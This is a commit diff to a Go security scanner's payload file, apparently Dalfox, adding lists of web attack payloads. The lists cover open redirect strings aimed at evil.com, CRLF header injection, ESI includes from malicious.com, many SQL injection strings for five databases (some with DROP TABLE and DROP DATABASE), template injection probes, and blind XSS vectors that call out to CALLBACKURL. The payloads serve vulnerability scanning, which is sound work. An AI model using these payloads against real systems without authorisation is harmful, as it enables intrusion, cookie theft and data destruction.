Update payload.go

Add new mini payloads
hahwul · Sep 3, 2024 · 0fa7d98 · 0fa7d98
1 parent c207f4c
commit 0fa7d98
Showing 1 changed file with 169 additions and 0 deletions.
diff --git a/pkg/scanning/payload.go b/pkg/scanning/payload.go
@@ -108,6 +108,21 @@ func getOpenRedirectPayload() []string {
 		"https://%5cgoogle.com",
 		"/https://%5cgoogle.com",
 		"https://google.com",
+		"//google.com?redirect=https://evil.com",
+		"//google.com#https://evil.com",
+		"/https://evil.com",
+		"//google.com/?q=https://evil.com",
+		"//google.com/?next=https://evil.com",
+		"//google.com/?r=https://evil.com",
+		"/\\https://evil.com",
+		"//google.com?continue=https://evil.com",
+		"/%2e%2e//google.com",
+		"//google.com/%3fhttps://evil.com",
+		"/https://@google.com",
+		"//google.com@evil.com",
+		"//google.com@%20@evil.com",
+		"//google.com%3F%40evil.com",
+		"//google.com%2F@evil.com",
 	}
 	return payload
 }
@@ -117,13 +132,29 @@ func getCRLFPayload() []string {
 		"%0d%0aDalfoxcrlf: 1234",
 		"%E5%98%8D%E5%98%8ADalfoxcrlf: 1234",
 		"\\u560d\\u560aDalfoxcrlf: 1234",
+		"%0d%0a%0d%0aDalfoxcrlf: 1234",
+		"%0d%0aContent-Length: 0%0d%0a%0d%0aDalfoxcrlf: 1234",
+		"%0a%0dDalfoxcrlf: 1234",
+		"%0aContent-Type: text/html%0aDalfoxcrlf: 1234",
+		"%23%0d%0aDalfoxcrlf: 1234", // URL-encoded #
+		"%25%30%61%Dalfoxcrlf: 1234", // URL-encoded %0a
+		"%C0%AE%C0%AE%C0%AE%C0%AEDalfoxcrlf: 1234", // double-encoded CRLF
 	}
 	return payload
 }
 
 func getESIIPayload() []string {
 	payload := []string{
 		"<esi:assign name=\"var1\" value=\"dalfox\"><esii-<esi:vars name=\"$(var1)\">",
+		"<esi:include src=\"/evil\"/>",
+		"<esi:include src=\"http://malicious.com/evil\"/>",
+		"<esi:eval>document.cookie</esi:eval>",
+		"<esi:choose><esi:when test=\"$(HTTP_COOKIE{'session'})\"><esi:eval>document.cookie</esi:eval></esi:when></esi:choose>",
+		"<esi:choose><esi:when test=\"$(HTTP_USER_AGENT{'Mozilla'})\"><esi:include src=\"/malicious\"/></esi:when></esi:choose>",
+		"<esi:vars name=\"$(HTTP_HOST)\"/>",
+		"<esi:vars name=\"$(QUERY_STRING)\"/>",
+		"<esi:assign name=\"x\" value=\"1\"><esi:choose><esi:when test=\"$(x)\"><esi:include src=\"http://malicious.com/evil\"/></esi:when></esi:choose>",
+		"<esi:remove><esi:include src=\"/error\"/></esi:remove>",
 	}
 	return payload
 }
@@ -175,6 +206,118 @@ func getSQLIPayload() []string {
 		" AND 1=1#",
 		" AND 1=0#",
 		" ORDER BY 1",
+		" ORDER BY 2",
+		" ORDER BY 3",
+		" ORDER BY 4",
+		// Union-based Injections
+		"' UNION SELECT NULL",
+		"' UNION SELECT NULL,NULL",
+		"' UNION SELECT NULL,NULL,NULL",
+		"' UNION SELECT 1,2,3--",
+		" UNION SELECT 1,2,3--",
+		" UNION SELECT NULL,NULL,NULL--",
+		" UNION ALL SELECT NULL,NULL,NULL--",
+		" UNION SELECT 1,version(),3--",
+		" UNION SELECT 1,database(),3--",
+		" UNION SELECT 1,user(),3--",
+		// MySQL Specific Payloads
+		"' AND 1=CONVERT(int, (SELECT @@version))--",
+		"' OR SLEEP(5)--",
+		"' OR BENCHMARK(1000000,MD5(1))--",
+		" OR 1=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(113)||CHR(106)||CHR(118)) AS INTEGER)--",
+		" AND ASCII(SUBSTRING((SELECT user()),1,1)) = 114",
+		"' OR 'x'='x",
+		"' OR 'x'='x' --",
+		" OR 'unusual_string'='unusual_string",
+		" OR 'test'='test'",
+		" OR 1 GROUP BY CONCAT('abc',VERSION(),FLOOR(RAND(0)*2)) HAVING MIN(0)--",
+		" OR 1=1; DROP TABLE users; --",
+		" OR 1=1; DROP DATABASE testdb; --",
+		"' OR IF(1=1, SLEEP(5), 0)--",
+		"' OR IF(1=1, BENCHMARK(1000000, MD5(1)), 0)--",
+		"' OR IF(1=1, (SELECT database()), 0)--",
+		"' OR IF(1=1, (SELECT user()), 0)--",
+		"' OR IF(1=1, (SELECT version()), 0)--",
+		// PostgreSQL Specific Payloads
+		" OR pg_sleep(5)--",
+		" AND pg_sleep(5)--",
+		" AND 1=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(107)||CHR(113)||CHR(113)||CHR(106)||CHR(118)) AS INTEGER)--",
+		" OR '1'='1",
+		"' OR EXISTS(SELECT 1 FROM information_schema.tables)--",
+		" UNION SELECT NULL,version()--",
+		"' AND (SELECT COUNT(*) FROM pg_tables)>0--",
+		"' UNION ALL SELECT 1,2,3,4--",
+		"' AND (SELECT 1 FROM pg_stat_activity) = 1--",
+		"' AND CURRENT_USER = 'postgres'--",
+		"' AND SUBSTRING((SELECT version()), 1, 10) = 'PostgreSQL'--",
+		"' AND 1=CAST((SELECT COUNT(*) FROM pg_tables) AS INTEGER)--",
+		"' UNION SELECT table_name FROM information_schema.tables--",
+		"' AND (SELECT setting FROM pg_settings WHERE name='server_version') = '13.2'--",
+		// MSSQL Specific Payloads
+		"' OR SLEEP(5)--",
+		"' WAITFOR DELAY '00:00:05'--",
+		" OR WAITFOR DELAY '00:00:05'--",
+		" AND WAITFOR DELAY '00:00:05'--",
+		" OR 1=CONVERT(int, (SELECT @@version))--",
+		"' AND (SELECT 1 FROM sysobjects WHERE id = OBJECT_ID('users') AND type = 'U')--",
+		" UNION ALL SELECT 1,@@version,3--",
+		" OR EXISTS(SELECT 1 FROM sysobjects)--",
+		"' AND (SELECT 1 FROM information_schema.tables)--",
+		"' AND CHAR(113)+CHAR(120)+CHAR(112)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(106)+CHAR(118)--",
+		" UNION SELECT system_user, user_name()--",
+		"' UNION SELECT @@version, 'database'--",
+		"' AND (SELECT IS_SRVROLEMEMBER('sysadmin'))=1--",
+		"' AND EXISTS(SELECT * FROM sys.fn_my_permissions(NULL, 'DATABASE') WHERE permission_name = 'ALTER')--",
+		// Oracle Specific Payloads
+		"' AND 1=(SELECT COUNT(*) FROM tablenames); --",
+		"' AND (SELECT COUNT(*) FROM all_users) > 0--",
+		"' AND (SELECT 1 FROM dual WHERE 1=1)--",
+		"' OR EXISTS(SELECT 1 FROM all_users WHERE rownum = 1)--",
+		" UNION SELECT 1, banner FROM v$version--",
+		"' AND (SELECT COUNT(*) FROM all_tables WHERE rownum = 1)--",
+		" UNION SELECT table_name FROM all_tables WHERE rownum = 1--",
+		" AND EXISTS(SELECT 1 FROM dual WHERE 1=1)--",
+		" AND (SELECT COUNT(*) FROM v$session WHERE rownum = 1)--",
+		"' OR 'x'='x' AND 1=(SELECT COUNT(*) FROM user_tables); --",
+		"' AND EXISTS(SELECT 1 FROM all_objects WHERE object_type='TABLE' AND rownum = 1)--",
+		"' UNION SELECT username FROM all_users WHERE rownum = 1--",
+		"' AND (SELECT 1 FROM dual WHERE 1=1 AND rownum=1)=1--",
+		"' AND (SELECT COUNT(*) FROM v$session) > 0--",
+		// SQLite Specific Payloads
+		"' UNION SELECT null,sqlite_version(),null--",
+		"' AND (SELECT COUNT(*) FROM sqlite_master WHERE type='table')>0--",
+		"' AND 1=sqlite_version(); --",
+		"' AND EXISTS(SELECT 1 FROM sqlite_master WHERE type='table')--",
+		"' UNION SELECT name FROM sqlite_master WHERE type='table'--",
+		" UNION SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name != 'sqlite_sequence'--",
+		" AND EXISTS(SELECT 1 FROM sqlite_master WHERE type='table' AND name='users')--",
+		"' OR (SELECT COUNT(*) FROM sqlite_master WHERE type='table') > 0--",
+		"' UNION SELECT tbl_name FROM sqlite_master WHERE type='table'--",
+		"' AND (SELECT sql FROM sqlite_master WHERE type='table' AND tbl_name='users') = 'CREATE TABLE'--",
+		"' AND (SELECT 1 FROM sqlite_master WHERE type='table' AND tbl_name='users') = 1--",
+		// General Payloads
+		"' OR 1=1--",
+		"' OR 1=1#",
+		"' OR 'a'='a",
+		"' OR 1=1/*",
+		" OR 1=1--",
+		" OR '1'='1' --",
+		"' OR 'x'='x' --",
+		" OR 'unusual_string'='unusual_string",
+		"' OR 1=1-- -",
+		" OR 1=1#",
+		"' AND 1=1--",
+		"' AND 1=0--",
+		"' AND 1=1#",
+		"' AND 1=0#",
+		"' AND 1=1/*",
+		"' AND 1=0/*",
+		"' AND 'a'='a",
+		"' AND 'a'='a'--",
+		" OR 1=1/*",
+		" OR 1=0/*",
+		" OR 'a'='a'/*",
+		" OR 'a'='a'--",
 	}
 	return payload
 }
@@ -192,6 +335,20 @@ func getSSTIPayload() []string {
 		"{@444*6664}",
 		"[[444*6664]]",
 		"${{\"{{\"}}444*6664{{\"}}\"}}",
+		"${{{{{\"444*6664\"}}}}}",
+		"{{= 444*6664 }}",
+		"{{ 444*6664 | safe }}",
+		"{{ 444*6664 | e }}",
+		"#{ 444*6664 }",
+		"{{ 444*6664 }}",
+		"{% 444*6664 %}",
+		"{% raw %}{{ 444*6664 }}{% endraw %}",
+		"{% set x = 444*6664 %}",
+		"${{{{'444*6664'}}}}",
+		"{{*444*6664}}",
+		"{# 444*6664 #}",
+		"{* 444*6664 *}",
+		"{{{444*6664}}}",
 	}
 	return payload
 }
@@ -273,6 +430,18 @@ func getBlindPayload() []string {
 		"\"'><script src=https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js></script><div ng-app ng-csp><textarea autofocus ng-focus=\"d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='CALLBACKURL'\"></textarea></div>",
 		"javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/\"/+/onmouseover=1/+/[*/[]/+document.location=`CALLBACKURL`//'>",
 		"\"'><svg onload=\"javascript:eval('d=document; _ = d.createElement(\\'script\\');_.src=\\'CALLBACKURL\\'%3Bd.body.appendChild(_)')\" xmlns=\"http://www.w3.org/2000/svg\"></svg>",
+		"\"'><iframe src=CALLBACKURL onload=alert(1)>", 
+		"\"'><body onload=location.href='CALLBACKURL'>",
+		"\"'><img src=1 href=1 onerror=location='CALLBACKURL'>",
+		"\"'><link rel='import' href='CALLBACKURL'>",
+		"\"'><style>@import url('CALLBACKURL');</style>",
+		"\"'><object data=CALLBACKURL>",
+		"\"'><form action=CALLBACKURL method=post><input type=submit></form>",
+		"\"'><meta http-equiv='refresh' content='0;URL=CALLBACKURL'>",
+		"\"'><video><source onerror='document.location.href=CALLBACKURL'>",
+		"\"'><audio src onerror='document.location.href=CALLBACKURL'>",
+		"\"'><details ontoggle='location=\"CALLBACKURL\"'>",
+		"\"'><input type=image src=x onerror='document.location=CALLBACKURL'>",
 	}
 	return payload
 }